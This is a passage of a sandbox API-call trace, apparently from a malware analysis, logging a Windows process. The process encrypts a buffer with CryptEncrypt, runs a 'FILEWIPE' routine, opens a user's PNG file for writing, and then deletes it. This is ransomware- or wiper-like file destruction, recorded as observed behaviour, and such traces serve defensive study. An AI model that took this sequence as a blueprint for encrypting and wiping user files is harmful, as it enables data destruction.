(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0191.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.075] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2788, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2788*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.075] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.075] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.075] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.075] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.076] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.076] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0191.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.076] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x542a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x5430) returned 1 [0191.076] CharLowerBuffW (in: lpsz="byte[21553]", cchLength=0xb | out: lpsz="byte[21553]") returned 0xb [0191.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.077] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf4888*, pdwDataLen=0x87e820*=0x542a, dwBufLen=0x5430 | out: pbData=0xbf4888*, pdwDataLen=0x87e820*=0x5430) returned 1 [0191.077] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.079] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.079] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.080] CryptDestroyKey (hKey=0x90af18) returned 1 [0191.080] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.080] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.081] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.081] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0191.083] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_jWe.png", cAlternateFileName="")) returned 0x90af58 [0191.083] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.083] CharLowerBuffW (in: lpsz="byte[21546]", cchLength=0xb | out: lpsz="byte[21546]") returned 0xb [0191.083] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.084] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.084] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.084] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.085] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.085] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.085] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\_jwe.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0191.085] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.086] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.086] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.087] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.087] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.087] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.087] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.087] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFilePart=0x0) returned 0x40 [0191.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x171c9d00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_jWe.png", cAlternateFileName="")) returned 0x90af58 [0191.087] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\_jwe.png")) returned 1 [0191.089] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x171c9d00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="_jWe.png", cAlternateFileName="")) returned 0 [0191.089] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.090] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.090] RtlAllocateHeap 